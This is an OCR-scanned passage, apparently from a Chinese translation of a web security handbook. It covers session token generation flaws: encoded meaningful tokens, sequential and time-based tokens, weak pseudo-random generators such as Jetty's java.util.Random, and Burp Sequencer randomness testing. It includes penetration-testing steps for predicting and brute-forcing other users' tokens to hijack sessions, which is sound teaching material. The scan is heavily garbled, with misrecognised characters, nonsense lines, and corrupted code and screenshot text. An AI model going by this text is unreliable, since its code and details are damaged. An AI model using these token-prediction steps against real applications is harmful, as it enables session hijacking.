应 用 程序 的 交互 状态 ， 而 是 传送 所 有 必要 数据 (一 般 保存 在 cookie 或 
隐藏 表单 字段 中 ) ， 由 客户 端 管理 状态 。 实 际 上 ， 这 种 机 制 以 类 似 于 
ASP.NET ViewState 的 方式 使 用 无 会 话 状 态 。 为 保证 这 种 机 制 的 安全 ， 
必须 对 通过 客户 端 传送 的 数据 加 以 适当 保护 。 这 通常 要 求 建立 一 个 包 
含 所 有 状态 信息 的 二 进 制 巨 对 象 ， 并 使 用 一 种 公认 的 算法 对 这 些 数 据 
进行 加 密 或 签名 。 还 必须 在 数据 中 包含 足够 的 上 下 文 ， 以 防止 攻击 者 
将 在 应 用 程序 某 个 位 置 收 集 到 的 状态 对 象 提交 到 另 一 个 位 置 ， 造 成 某 
种 意外 行为 。 应 用 程序 还 必须 在 对 象 的 数据 中 包含 一 个 终止 时 间 ， 执 
行 与 会 话 超时 相同 的 功能 。 我 们 已 在 第 5 章 详 细 介 绍 过 通过 客户 端 传送 
数据 的 各 种 安全 机 制 。 


渗透 测试 步骤 


(1) 如 果 应 用 程序 使 用 HTTP 验 证 ， 它 可 能 并 不 执行 会 话 管理 
机 制 。 使 用 前 面 描述 的 方法 分 析 任何 可 能 是 令 牌 的 数据 的 作用 。 
(2) 如 果 应 用 程序 使 用 无 会 话 状 态 机 制 ， 通 过 客户 端 传送 所 
有 必要 数据 进行 状态 维护 ， 有 时 我 们 可 能 很 难 检 测 出 这 种 机 制 ， 但 
如 果 发 现下 列 迹象 ， 即 可 确定 应 用 程序 使 用 这 种 机 制 。 
口 向 客户 端 发 布 的 可 能 令 牌 的 数据 相当 长 《如 100 B 或 超过 100 


口 应 用 程序 对 每 个 请 求 做 出 啊 应 ， 发 布 一 个 新 的 类 似 令 牌 的 数 


口 数据 似乎 被 加 密 〈 因 此 无 法 辨别 其 结构 ) 或 包含 签名 (由 有 
义 的 结构 和 几 个 字 厄 的 无 意义 二 进 制 数据 组 成 。 

O 应 用 程序 拒绝 通过 多 个 请 求 提交 相同 数据 的 做 法 。 

(3) 如 果 相 关 证 据 明 确 表明 应 用 程序 并 未 使 用 会 话 令 牌 管理 
状态 ， 那 么 本 章 摘 述 的 任何 攻击 都 不 可 能 达到 其 目的 。 因 此 ， 最 好 
着 手 去 寻找 其 他 严重 的 漏洞 ， 如 访问 控制 不 完善 或 代码 注入 。 


7.2 Bi 生成 过 程 中 以 


由 于 生成 令 牌 的 过 程 不 安全 ， 攻 击 者 能 够 确定 发 布 给 其 他 用 户 的 
令 牌 ， 致 使 会 话 管理 机 制 易 于 受到 攻击 。 


T 注解 许多 时 候 ， 应 用 程序 的 安全 取决 于 它 所 生成 的 令 牌 


的 不 可 预测 性 ， 以 下 是 一 些 示 例 : 

口 发送 到 用 户 注 册 的 电子 邮件 地 址 的 密码 恢复 令 牌 ; 

口 隐 藏 表单 字段 中 用 于 防止 跨 站 点 请 求 仿造 攻击 (请 参阅 第 13 
章 ) 的 令 牌 ; 


口 用 于 一 次 性 访问 受 保护 的 资源 的 令 牌 ; 


口 “ 记 住 我 ?功能 使 用 的 永久 令 牌 ; 
口 示 使 用 验证 的 购物 应 用 程序 的 消费 者 用 于 检索 现 有 订单 的 当 
前 状态 的 令 脾 。 

在 本 章 中 ， 我 们 主要 讨论 适用 于 上 述 所 有 情形 的 与 令 牌 生 
成 有 关 的 缺陷 。 实 际 上 ， 由 于 当前 的 许多 应 用 程序 都 采用 成 熟 
的 乎 台 机 制 来 生成 会 话 令 牌 ， 因 此 ， 往 往 会 在 这 些 功能 区 域 发 
现 有 关 令 牌 生成 的 可 利用 缺陷 。 


VY 


7.2.1 = 


一 些 会 话 令 牌 通 过 用 户 的 用 户 名 或 电子 邮件 地 址 转换 而 来 ， 或 者 
使 用 与 其 相关 的 其 他 信息 创建 。 这 些 信息 可 以 某 种 方式 进行 编码 或 模 
糊 处 理 ， 也 可 与 其 他 数据 结合 在 一 起 。 

例如 ， 初 看 起 来 ， 下 面 的 令 牌 由 一 长 串 随机 字符 组 成 : 


75736572306461663b6170703d61646d696e3b646174653d30312£31322£3131 
但 是 ， 仔 细 分 析 后 发 现 ， 其 中 仅 包含 十 六 进 制 字符 。 猜 想 这 个 字 
符 串 可 能 是 一 个 经 过 十 六 进 制 编码 的 ASCI 字 符 串 ， 我 们 使 用 解码 器 
对 其 解码 ， 发 现 它 实际 是 : 


user=daf ;app=admin; date=10/09/11 


攻击 者 可 以 利用 这 个 会 话 令 牌 的 含义 猜测 其 他 应 用 程序 用 户 的 当 
前 会 话 。 使 用 一 组 枚 举 出 的 用 户 名 或 常见 用 户 名 ， 就 能 够 迅速 生成 大 
量 可 能 有 效 的 令 牌 ， 并 进行 测试 以 确定 它们 是 否 有 效 。 

包含 有 含义 数据 的 令 牌 通常 表现 出 某 种 结构 。 也 就 是 说 ， 它 们 由 
几 种 成 分 组 成 ， 通 常 以 分 隔 符 隔 开 ， 攻 击 者 可 分 别提 取 并 分 析 这 些 成 
a 
儿 项 。 

口 账户 用 户 名 。 

口 应 用 程序 用 来 区 分 账户 的 数字 标识 符 。 

口 用 户 姓 名 中 的 名 / 姓 。 

口 用 户 的 电子 邮件 地 址 。 

口 用 户 在 应 用 程序 中 所 属 的 组 或 扮演 的 角色 。 

Oy 日 期 /时 间 戳 。 

口 一 个 递增 或 可 预测 的 数字 。 

口 客户 端的 IP 地 址 。 

为 特意 对 其 内 容 进 行 模糊 处 理 ， 或 者 只 是 为 了 确保 二 进 制 数据 能 
通过 HTTP 安 全 传输 ， 应 用 程序 会 对 结构 化 令 牌 中 的 每 个 不 同 成 分 或 整 
个 令 牌 以 不 同方 式 进行 编码 。 常 用 的 编码 方案 包括 XOR、Base64 和 使 
用 ASCII 字 符 的 十 六 进 制 表示 法 (请 参阅 第 3 章 了 解 相关 内 容 ) 。 为 将 
其 恢复 到 原始 状态 ， 可 能 有 必要 对 结构 化 令 牌 的 每 一 个 成 分 使 用 各 种 
不 同 的 解码 方法 。 


TZ 注解 当 处 理 包含 结构 化 令 牌 的 请 求 时 ， 应 用 程序 可 能 不 


会 处 理 令 牌 中 的 每 一 个 成 分 或 每 个 成 分 中 的 所 有 数据 。 在 前 面 的 示 
例 中 ， 应 用 程序 可 能 会 对 令 牌 进行 Base64 解 码 ， 然 后 只 处 理 其 中 


的 “用 户 ”(user) 和 “日 期 ”(date) 成 分 。 如 果 令 牌 中 包含 一 个 二 进 
制 巨 对 象 ， 那 么 这 些 数 据 中 的 大 部 分 为 填充 数据 ， 只 有 一 小 部 分 数 
据 与 服务 器 在 令 牌 上 执行 的 确认 有 天。 减少 令 牌 中 确实 必需 的 成 分 
的 数量 通常 可 显著 降低 令 有 牌 的 复杂 程度 。 


渗透 测试 步骤 


(1) 从 应 用 程序 中 获取 一 个 令 牌 ， 对 其 进行 系统 化 的 修改 ， 
以 确定 整个 令 牌 是 否 有 效 ， 或 者 令 脾 的 某 些 成 分 是 否 被 名 上 略 。 党 试 
以 一 次 一 个 字 节 (或 者 一 次 一 个 位 ) 的 方式 更 改 令 牌 的 值 ， 然 后 重 
源 回 应 用 程序 提交 修改 后 的 令 牌 ， 看 应 用 程序 是 否 仍然 接受 这 个 令 
牌 。 如 果 发 现 令 牌 中 的 某 些 部 分 实际 上 并 无 作用 ， 可 以 将 它们 排除 
在 深入 分 析 之 外 ， 以 减轻 工作 负担 。 可 以 使 用 Burp Intruder 中 
的 “char frobber”* 有 效 载 何 类 型 修改 令 牌 的 值 ， 每 次 修改 一 个 字符 ， 
以 帮助 完成 此 任务 。 

(2) 在 不 同时 间 以 不 同 的 用 户 登 录 ， 记 录 服 务 咽 发 布 的 令 
脾 。 如 果 应 用 程序 允许 自我 注册 ， 可 以 选择 自己 的 用 户 名 ， 用 一 系 
列 存在 细微 差别 的 相似 用 户 名 登录 ， 如 A、AA、AAA、AAAA、 
AAAB、AAAC、AABA 等 。 如 果 其 他 与 某 一 名 用 户 有 关 的 数据 

(如 电子 邮件 地 址 ) 在 登录 阶段 提交 或 保存 在 用 户 资料 中 ， 对 其 进 
行 与 前 面 类 似 的 系统 化 修改 ， 并 记录 登录 后 收 到 的 令 牌 。 

(3) 对 令 牌 进行 分 析 ， 查 找 任何 与 用 户 名 和 其 他 用 户 可 控制 
的 数据 有 关 的 内 容 。 

(4) 分 析 令 牌 ， 查 找 任何 明显 的 编码 或 模糊 处 理 方案 。 如 果 
用 户 名 包含 一 组 相同 的 字符 ， 在 令 牌 中 寻找 可 能 使 用 XOR 模 糊 处 理 
的 对 应 字符 序列 ; 在 令 牌 中 寻找 仅 包含 十 六 进 制 字 符 的 字符 序列 ， 
它 表 示 应 用 程序 可 能 对 ASCII 字 符 串 进行 了 十 六 进 制 编码 处 理 ， 或 
者 披露 其 他 信息 。 寻 找 以 等 号 (=) 结尾 的 字符 序列 或 仅 包 含 其 他 
有 效 Base64 字 符 的 序列 ， 如 a~z、A~Z、0~9、+ 和 /。 

(5) 如 果 对 会 话 令 牌 样本 进行 逆向 工程 可 获得 任何 有 意义 的 
结果 ， 看 看 是 否 拥 有 足够 的 信息 可 猜测 出 应 用 程序 最 近 同 其 他 用 户 
发 布 的 令 牌 。 找 到 一 个 依赖 会 话 的 应 用 程序 页 面 〈《 即 如 果 不 使 用 有 
效 会 话 访 问 ， 就 会 返回 错误 消息 或 指向 其 他 位 置 的 重 定向 页 面 ) ， 
通过 Burp IPntruder 之 类 的 工具 可 使 猜测 出 的 令 牌 回 该 页 面 提 出 大 量 
a o A MA LE A EAP A ZR, SERNA SHA 
ny O 


尝试 访问 


http://mdsec.net/auth/321/ 
http://mdsec.net/auth/329/ 
http://mdsec.net/auth/331/ 


7.2.2 可 预测 


一 些 会 话 令 牌 并 不 包含 与 某 个 特定 用 户 有 关 的 任何 有 意义 的 数 
据 ， 但 由 于 它们 包含 某 种 顺序 或 模式 ， 人 允许 攻击 者 通过 几 个 令 牌 样本 
即 可 推断 出 应 用 程序 最 近 发 布 的 其 他 有 效 令 牌 ， 因 此 具有 可 预测 性 。 
即使 推断 过 程 需 要 做 出 大 量 尝 试 ， 并 且 成 功率 极 低 (例如 ， 每 1000 次 
洋 试 得 到 一 个 有 效 令 牌 ，”， 上 自动 攻击 工具 也 仍然 能 够 利用 这 种 缺陷 在 
很 短 的 时 间 内 确定 大 量 有 将令 牌 。 

与 定制 应 用 程序 相 比 ， 会 话 管理 的 商业 应 用 (如 Web 服 务 器 或 
Web 应 用 程序 平台 ) 中 的 令 牌 可 预测 漏洞 更 容易 被 发 现 。 当 同一 个 定 
制 会 话 管 理 机 制 实施 远 程 攻击 时 ， 攻 击 者 所 能 获得 的 已 发 布 令 牌 样本 
的 数量 可 能 受到 服务 器 容量 、 其 他 用 户 的 活动 、 带 融 、 网 络 延 时 等 因 
素 的 限制 。 然 而 ， 在 实验 室 环 境 中 ， 渗 透 测 试 员 可 以 迅速 建立 数 百 万 
个 令 牌 样本 ， 所 有 样本 都 紧密 相连 ， 并 使 用 了 时 间 戳 ， 而 且 可 以 降低 
其 他 用 户 造 成 的 干扰 。 

在 最 简单 也 是 最 容易 受到 攻击 的 情况 下 ， 应 用 程序 使 用 一 个 简单 
的 连续 数字 作为 会 话 令 牌 。 这 时 ， 攻 击 者 只 需 获 得 两 个 或 三 个 令 牌 样 
本 就 可 以 实施 攻击 ， 并 立即 截获 当前 有 效 的 所 有 令 牌 。 

7-1 表 示 正 在 使 用 Burp Intruder 循 环 访问 一 个 连续 会 话 令 牌 的 最 
后 两 位 数字 ， 以 查找 会 话 仍 处 于 活动 状态 可 被 劫持 的 令 牌 值 。 这 时 ， 
服务 器 啊 应 的 长 度 是 发 现 有 效 会 话 的 可 靠 指 标 。 并 有 旦 从 中 提取 的 grep 
特性 也 可 用 于 显示 每 个 会 话 登 录用 户 的 用 户 名 。 


intruder attack 4 gee on =| 


atack save columns 


Fitter: showing all items 


results target positions | payloads options 
request | payload status error meo length Logged in as | comment 
8 07 200 | | 1314 John Herman a 
28 [1b 200 | | 1348 Administrator = 
135 122 200 we L) H329 Pebiina 
73 (48 200 | 1312 GUnit 
1128 I 200 | | | | 11357 PSCDMGSILNY 
1147 (92 200 } | 1332 Keyock | 
0 | 302 | | | §46 baseline request 
1 |00 302 Í Ei | 546 
2 (01 302 | 546 
3 2 302 1 | E 1546 zj 
request sponse 
aw param heacer ne 
ET uth J me.ashx HTTP/1.1 = 
Host: måsec.ne 
User-Agent: Kozilla/5.0 (Windows: U; Windovs NT 6.1; en-GB; rv:1.5.2.10) 


Gecko/20100914 Fizefox/3.6. 10 

cept: text/html, application/xhctml4xml, applícation/ xml; q=0.5,*/*;q=0.8 
-Language: en-gb,en:q-0.5 
ji gzip,deflate 


cept-Charset: 150-5895S-<1,utt-8:qe0.7,*;q90.7 


nnecrion lose 
Referer: heeps://mdsec.net/auth/ 340/ Default .ashx 
Cookie: Sessgionld=51E062E93E9FB22 
= 
0 matches 
finished > 


图 7-1 会 话 令 牌 可 预测 时 查找 有 效 会 话 的 一 次 攻击 


Ll 


在 其 他 情况 下 ， 应 用 程序 令 牌 中 可 能 包含 更 加 复杂 的 序列 ， 需 要 
付出 一 定 的 努力 才能 发 现 。 序 列 的 变化 形式 可 能 多 种 多 样 ， 但 是 ， 根 
据 我 们 的 行业 经 给， 可 预测 的 会 话 令 牌 通常 来 自 3 个 方面 : 

口 隐 含 序列 ; 

口 时 间 依 赖 ; 

口 生 成 的 数字 随机 性 不 强 。 

我 们 将 分 别 讨论 这 3 种 情况 。 

1. 隐 含 序列 

有 时 ， 对 会 话 令 牌 的 原始 形式 进行 分 析 可 能 无 法 预测 它们 ; 但 
是 ， 对 其 进行 适当 解码 或 解 译 承 可 以 揭示 其 中 包含 的 序列 。 

以 下 面 一 组 值 为 例 ， 它 是 一 个 结构 化 会 话 令 牌 的 组 成 成 分 : 


lwjVJA 
Ls3Ajg 
xpKr+A 
XlexYg 
9hyCzA 
jeFuNg 
JaZZoA 
眼看 来 ， 其 中 并 不 包含 任何 模式 。 然 而 ， 粗 略 检 查 后 发 现 ， 令 
牌 中 可 能 包含 Base64 编 码 的 数据 ， 除 大 小 写 混合 的 字母 和 数字 字符 
外 ， 其 中 还 有 一 个 + 字符 ， 它 也 是 一 个 有 效 的 Base64 字 符 串 。 使 用 
Base64 解 码 器 对 令 牌 解码 ， 得 到 以 下 结 
--Õ$ 
AAZ 
Æ' «O 
^W-b 
ai 
?an6 
%IY 
很 明显 ， 这 些 字 符 串 是 乱码 ， 并 且 其 中 包含 非 打印 字符 。 通 党 来 
说 ， 这 表示 处 理 的 是 二 进 制 数 据 ， 而 非 ASCII 文 本 。 将 解码 后 的 数据 
以 十 六 进 制 表示 ， 得 到 : 
9708D524 
ZECDCO8E 
C692ABF8 
5E579762 
F61C82CC 
8DE16E36 
25A659A0 


其 中 仍然 没有 明显 的 模式 。 然 而 ， 如 采用 前 一 个 数字 减 去 后 一 个 
NF, PARE LAER: 

FF97C4EB6A 
97C4EB6A 

FF97C4EB6A 
97C4EB6A 

FF97C4EB6A 
FF97C4EB6A 


隐 合 的 模式 立即 显露 出 来 。 生 成 令 牌 的 算法 如 下 : 用 前 一 个 值 加 上 
0x97C4EB6A， 把 结果 截 短 成 一 个 32 位 的 数字 ， 并 对 这 个 二 进 制 数据 
进行 Base64 编 码 ， 使 其 能 够 通过 基于 文本 的 HTTP 协 议 传输 。 了 解 到 这 
一 点 ， 就 能 轻易 编写 出 一 段 肢 本， 生成 服务 句 接 下 来 产生 的 令 牧 ， 以 
及 它 在 被 截获 的 样本 之 前 产生 的 令 牌 。 
2. 了 时间 依赖 
一 些 Web 服 务 器 和 应 用 程序 使 用 时 间作 为 令 牌 值 的 输入 ， 通 过 某 

种 算法 生成 会 话 令 牌 。 如 果 没 有 在 算法 中 合并 足够 的 炳 [1， 攻 击 者 就 
可 能 推测 出 其 他 用 户 的 令 牌 。 虽 然 任何 特定 的 令 牌 序列 本 身 是 完全 随 
机 的 ， 但 是 ， 如 果 组 合生 成 每 个 令 牌 的 时 间 人 信息， 也 许可 以 发 现 某 种 
可 以 辨别 的 模式 。 一 个 忙碌 的 应 用 程序 每 秒 会 生成 大 量 的 会 话 ， 因 此 
实施 一 次 自 定 义 攻 击 就 可 以 成 功 确定 其 他 用 户 的 大 量 令 牌 。 

i 测试 一 家 网 上 零售 两 的 Web 应 用 程序 时 ， 我 们 过 到 以 下 令 有 牌 友 
列 : 


3124538-1172764258718 
3124539-1172764259062 
3124540-1172764259281 
3124541-1172764259734 
3124542-1172764260046 
3124543-1172764260156 
3124544-1172764260296 
3124545-1172764260421 
3124546-1172764260812 
3124547-1172764260890 


很 明显 ， 每 个 令 牌 由 两 个 独立 的 数字 组 成 : 前 一 个 数字 的 递增 模 
式 非常 简单 ， 很 容易 推测 。 后 一 个 数字 的 递增 值 每 次 都 有 所 变化 。 计 
算出 每 个 连续 令 牌 的 递增 值 ， 得 到 以 下 结果 : 

344 
219 
453 
312 
110 
140 
125 
391 
78 

这 个 序列 并 不 包含 可 预测 的 模式 。 但 显而易见 的 是 ， 攻 击 者 可 以 
通过 上 自动 攻击 确定 相关 的 数字 范围 ， 通 过 蛮 力 攻击 发 现 序 列 中 的 有 效 
值 。 不 过 ， 在 开始 攻击 前 ， 等 待 几 分 钟 后 可 截取 男 一 个 令 牌 序列 : 

3124553-1172764800468 
3124554-1172764800609 
3124555-1172764801109 
3124556-1172764801406 
3124557-1172764801703 
3124558-1172764802125 
3124559-1172764802500 
3124560-1172764802656 
3124561-1172764803125 
3124562-1172764803562 

将 这 个 令 牌 序列 与 第 一 个 序列 进行 比较 ， 立 即 得 到 两 个 明显 的 结 
论 。 

口 第 一 个 数字 序列 继续 递增 ， 但是， 第 一 个 数字 序列 后 面 遗 漏 了 5 
个 值 。 这 可 能 是 因为 应 用 程序 向 其 他 用 户 发 布 了 这 5 个 值 ， 他 们 在 两 次 
测试 的 间 际 登录 了 应 用 程序 。 

口 第 二 个 数字 序列 继续 增 大 ， 其 递增 形式 与 第 一 个 序列 类 似 。 但 
是 ， 得 到 的 第 一 个 值 比 前 一 个 值 大 539 578， 大 了 许多 。 


第 二 次 观测 的 结 采 立即 让 人 产生 警惕 ， 推 测 时 间 在 会 话 令 牌 生成 
过 程 中 发 挥 的 作用 。 显 然 ， 在 两 次 截取 令 牌 的 过 程 中 ， 应 用 程序 只 发 
布 了 5 个 令 牌 。 然 而 ， 时 间 已 经 过 去 将 近 10 分 钟 。 最 可 能 的 解释 是 : S 
牌 以 秒 为 时 间 依赖 ， 并 可 能 以 蝶 秒 计算 。 

确实 ， 预 感 古 正确 的 。 在 随后 的 测试 过 程 中 进行 一 次 代码 审查 ， 
可 发 现 以 下 令 牌 生成 算法 : 


String sessId = Integer.toString(s_SessionIndex++) + 
" v t 


System.currentTimeMillist{); 


考虑 对 如 何 生成 令 牌 所 做 的 分 析 ， 攻 击 者 可 以 直接 构造 一 个 目 定 
义 攻击 ， 获 得 应 用 程序 同 其 他 用 户 发 布 的 会 话 令 脾 。 

口 继 续 从 服务 万 中 提取 紧密 相连 的 新 会 话 令 牌 。 

口 监控 第 一 个 数字 的 递增 情况 。 如 采 递 增值 大 于 1， 可 知道 应 用 程 
序 问 其 他 用 户 发 布 了 一 个 令 脾 。 

口 癌 其 他 用 户 发 布 一 个 令 牌 时 ， 可 立即 知道 发 布 时 间 的 秒 上 限 和 
下 限 ， 因 为 攻击 者 拥有 在 这 个 令 牌 之 前 和 之 后 发 布 的 令 牌 。 由 于 不 断 
获得 新 会 话 令 牌 ， 这些 界限 之 间 通 第 只 包含 几 百 个 值 。 

口 应 用 程序 每 次 同 其 他 用 户 发 布 一 个 令 脾 ， 攻 击 者 瑟 实 施 一 次 蛋 
力 攻击 裔 历 这 个 范围 内 的 每 个 数字 ， 并 把 这 个 数 子 附加 到 已 经 发 布 给 
其 他 用 户 的 第 一 个 数字 序列 后 面 。 攻 击 者 竹 试 使 用 建立 的 每 个 令 牌 访 
问 一 个 受 保护 的 页 面 ， 直 到 壬 试 取得 成 功 ， 攻 破 该 用 户 的 会 话 。 

口 继续 运行 这 个 目 定 义 攻 击 即 可 截获 其 他 所 有 应 用 程序 用 户 的 令 
牌 。 一 名 管理 用 户 登 录 后 ， 整 个 应 用 程序 将 被 完全 攻破 。 


尝试 访问 


http://mdsec.net/auth/339/ 
http://mdsec.net/auth/340/ 
http://mdsec.net/auth/347/ 
http://mdsec.net/auth/351/ 


3. 生成 的 数字 随机 性 不 强 

计算 机 中 的 数据 极 少 完全 随机 。 因 此 ， 如 果 由 于 某 种 原因 需要 随 
机 数据 ， 一 般 通 过 软件 使 用 各 种 技巧 生成 伪 随 机 数字 。 所 使 用 的 一 些 
算法 生成 看 似 随 机 并 且 在 可 能 的 数值 范围 内 平均 分 布 的 序列 ， 但 有 些 
人 只 需要 少数 几 个 样本 ， 仍 然 能 够 准确 推导 出 整个 序列 。 

如 果 使 用 一 个 可 预测 的 伪 随 机 数字 发 生 名 生成 会 话 令 脾 ， 那 么 得 
到 的 令 牌 惑 易 于 受到 攻击 者 的 攻击 。 

Jetty 是 一 种 完全 以 Java 编 写 的 常用 Web 服 务 絮 ， 它 为 在 其 上 运行 的 
应 用 程序 提供 一 种 会 话 管理 机 制 。2006 年 ，NGSSoftware 的 Chris Anley 
发 现 这 种 机 制 易于 受到 会 话 令 牌 预测 攻击 。 该 服务 右 使 用 Java API 
java.util.Random 生 成 会 话 令 有 牌 。 它 执行 一 个 “线性 同 余 发 生 器 ” (linear 
congruential generator) ， 通 过 以 下 算法 生成 序列 中 的 下 一 个 数字 : 


synchronized protected int next{int bits) { 
seed = {seed * OxSDEECE66DL + OxBL) & ({1L << 48) - 1); 


return (int) (seed >>> (48 - bits)); 
} 

这 种 算法 实际 上 有 是 用 生成 的 最 后 一 个 数字 乘 以 一 个 常数 ， 再 加 上 
另 一 个 常数 ， 生 成 下 一 个 数字 。 得 到 的 数字 被 截 短 至 48 位 ; 然后 ， 算 
法 再 将 结果 进行 转换 ， 返 回 请 求 方 要 求 的 位 数 。 

了 解 了 这 种 算法 和 由 它 生 成 的 一 个 数字 后 ， 就 可 以 轻易 推算 出 接 
下 来 将 要 生成 的 数字 ， 并 且 (利用 一 点 数论 知识 ) 推导 出 它 之 前 生成 
的 数字 。 这 意味 看 攻击 者 只 需 从 服务 器 获得 一 个 会 话 令 牌 ， 谍 可 推测 
出 所 有 当前 和 将 来 的 会 话 令 脾 。 


TZ 注解 有 时 ， 令 牌 根据 一 个 伪 随 机 数字 发 生 器 的 输出 而 生 


成 ， 因 此 开发 者 决定 将 发 生 器 的 几 个 连续 输出 连接 起 来 建立 每 个 令 
牌 。 开 发 者 认为 使 用 这 种 方法 可 建立 一 个 更 长 因而 “更 强大 ”的 令 


牌 。 但 是 ， 这 种 策略 通常 是 一 种 误解 。 如 采 攻 击 者 能 够 获得 发 生 屁 
生成 的 几 个 连续 输出 ， 他 们 束 可 以 通过 它们 推断 出 发 生 右 内 部 状态 
的 一 些 信息 ， 因 此 更 容易 问 前 或 向 后 推导 发 生 器 的 输出 顺序 。 


其 他 非 定 制 应 用 程序 框 染 在 生成 会 话 令 牌 时 使 用 极其 简单 或 可 预 
测 的 灶 源 ， 其 中 许多 信 源 甚至 可 以 确定 。 例 如 ，PHP 框 染 5.3.2 及 早期 
版 本 基于 客户 端的 卫 地 址 、 生 成 令 牌 时 的 纪元 时 间 、 生 成 令 牌 时 的 微 
秒 ， 以 及 线性 同 余 发 生 需 来 生成 会 话 令 牌 。 昌 然 其 中 有 儿 个 未 知 值 ， 
但 是 ,一些 应 用 程序 可 以 披露 相关 信息 ， 从 而 推断 出 这 些 值 。 社 交 网 
络 站 点 可 能 会 记录 用 户 的 登录 时 间 和 IP 地 址 。 此 外 ， 该 发 生 器 使 用 的 
种 子 是 PHP 进 程 启动 的 时 间 ， 如 有 果 攻 击 者 对 服务 右 进 行 监视 ， 束 可 以 
将 这 个 值 缩 定 在 一 个 很 小 的 范围 内 。 


T 注解 这 是 一 个 不 断 发 展 的 研究 领域 。2001 年 ，Full 
Disclosure 邮 件 列表 指出 PHP 会 话 令 牌 生成 过 程 存 在 缺陷 ， 但 并 未 证 


实 该 缺陷 可 被 利用 。2010 年 ，Samy Kamkar 最 终 使 用 phpwn 工 具 实 
现 了 对 这 一 缺陷 的 利用 。 


4. 测试 随机 性 强度 

某 些 时 候 ， 仅 仅 通过 观察 ， 或 者 通过 适度 的 手动 分 析 ， 束 可 以 确 
定 一 系列 令 牌 的 模式 。 但 是 ， 通 党 而 言 ， 需 要 使 用 更 加 产 格 的 方法 来 
测试 应 用 程序 令 牌 的 随机 性 强度 。 

完成 测试 的 标准 方法 是 应 用 统计 假设 测试 原则 ， 并 采用 各 种 严格 
的 测试 查找 令 牌 样本 的 非 随机 性 。 测 试 过 程 的 主要 步 又 如 下 。 

(1) 首先 ,假设 令 牌 是 随机 生成 的 。 

(2) 进行 一 系列 测试 ， 通 过 每 个 测试 观察 可 能 具有 某 些 特征 的 令 
牌 样本 (如 果 令 牌 是 随机 生成 的 ) 的 特定 属性 。 

(3) 对 于 每 个 测试 ,假定 以 上 假设 是 正确 的 ， 计 算 观 察 到 的 特征 
ACE ATHLES ° 


(4) 如 果 该 几率 在 某 一 水 平 (显著 性 水 平 ) 之 下 ， 则 和 否定 上 述 假 
设 ， 并 得 出 结论 令 牌 不 是 随机 生成 的 。 

邓 运 的 是 ， 并 不 需要 手动 完成 上 述 步骤 ! 当前 ，Burp Sequencer 
测试 Web 应 用 程序 令 牌 随机 性 的 最 佳 工具 。 该 工具 可 灵活 进行 各 种 标 
准 测试 ， 并 为 你 提供 易于 解释 的 明确 结果 。 

要 使 用 Burp Sequencer， 需 要 从 发 布 希 望 进行 测试 的 令 脾 的 应 用 程 
序 中 找到 一 个 响应 ， 如 应 用 程序 对 发 布 包含 会 话 令 牌 的 新 cookie 的 登 
录 请 求 做 出 的 啊 应 。 然 后 ， 从 Burp 的 上 下 文 菜 单 中 选择 “发 送 至 
sequencer” (send to sequencer) ， 并 在 Sequencer 配 置 中 设置 令 牌 在 响 
应 中 的 位 置 ， 如 图 7-2 所 示 。 还 可 以 配置 各 种 确定 如 何 收集 令 牌 的 选 
项 ， 然 后 单 击 “ 开 始 捕 获 ” (start capture) 按钮 ， 开 始 收集 令 牌 。 如 果 
已 经 通过 其 他 方法 (例如 ， 通 过 保存 某 次 Burp Intruder 攻 击 的 结果 ) 获 
得 适当 的 令 牌 样本 ， 则 可 以 使 用 “手动 加 载 ”(manual load) 选项 卡 跳 
过 令 有 牌 收集 过 程 ， 直 接 进 入 统计 分 析 阶 段 。 


burp snte professional OL 2Sa 
| rhudet 


1 epealel sequence decode compare op@ors akris 


Ine Capture | mansai load | options 


select request 
hiips.imdsacnet POST /aulv36 VOstauiLastx HTTP! 1Host mdsecnwlser-Agent Mouita’S9 _ | 


图 7-2 ”将 BurpSequencer 配 置 为 测试 会 话 令 牌 的 随机 性 


获得 适当 的 令 牌 样本 后 ， 束 可 以 对 样本 进行 统计 分 析 了 。 还 可 以 
在 收集 样本 的 同时 进行 中 间 分 析 。 一 般 来 说 ， 获 得 更 多 样本 可 提高 分 


析 的 可 靠 性 。Burp 需 要 的 最 小 样本 大 小 为 100 个 令 有 牌 ， 但 最 好 是 收集 更 
多 样本 。 如 果 在 分 析 几 百 个 令 牌 后 ， 结 论 表 明令 牌 没有 通过 随机 性 测 
试 ， 那 么 ， 可 以 确定 ， 没 有 必要 再 收集 其 他 令 牌 。 否 则 ， 继 续 收 集 令 
牌 并 定期 重新 进行 分 机。 如 果 收 集 了 5000 个 令 牌 ， 并 且 结 论 表 明 这 些 
令 脾 通过 了 随机 性 测试 ， 则 可 以 确定 这 一 数量 已 经 足够 。 但 是 ， 为 符 
合 正 式 的 FIPS 随 机 性 测试 ， 需 要 获得 20 000 个 令 牌 样本 ， 这 是 Burp 文 
持 的 最 大 样本 大 小 。 

Burp Sequencer 在 字符 和 位 级 别 执行 统计 测试 。 所 有 测试 结果 将 进 
MEX, UNSEREN MA 〈 这 是 需要 考虑 的 关键 结果 ) 进 
行 总 体 评估 。 但 是 ， 还 可 以 深入 分 析 每 项 测试 的 结果 ， 了 解 令 牌 的 不 
同 部 分 如 何以 及 为 何 通 过 或 未 通过 每 项 测试 ， 如 图 7-3 所 示 。 用 于 每 类 
测试 的 方法 在 测试 结果 下 面 进 行 了 说 明 。 
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图 7-3 ”分 析 BurpSequencer 结 果 以 了 解 所 测试 令 牌 的 属性 


Lo 


需要 注意 的 是 ，Burp 会 对 令 牌 中 的 每 个 字符 和 数据 位 单独 进行 所 
有 测试 。 许 多 时 候 ， 你 会 发 现 ， 大 部 分 的 结构 化 令 牌 都 不 是 随机 的 ， 
这 本 吴 并 不 表示 存在 任何 类 型 的 缺陷。 重要 的 是 ， 令 牌 应 包含 足以 通 
过 随机 性 测试 的 位 数 。 例 如 ， 如 果 某 个 大 令 牌 包含 1000 位 信息 ， 但 其 
中 只 有 50 个 位 通过 了 随机 性 测试 ， 那 么 ， 总 体 而 言 ， 该 令 牌 还 不 如 一 
个 完全 通过 随机 性 测试 的 50 位 令 牌 可 靠 。 


T 注解 在 进行 随机 性 统计 测试 时 ， 请 记 住 两 个 要 点 。 这 些 
要 点 会 影响 你 对 测试 结果 的 解释 ， 并 会 影响 应 用 程序 的 安全 状态 。 
首先 ， 以 完全 确定 的 方式 生成 的 令 牌 可 能 会 通过 随机 性 统计 测试 。 
例如 ， 线 性 同 余 伪 随机 数字 发 生 器 ， 或 计算 连续 数字 的 散 列 的 算 
法 ， 可 能 会 生成 通过 测试 的 输出 。 但 是 ， 如 果 攻 击 者 了 解 该 算法 和 
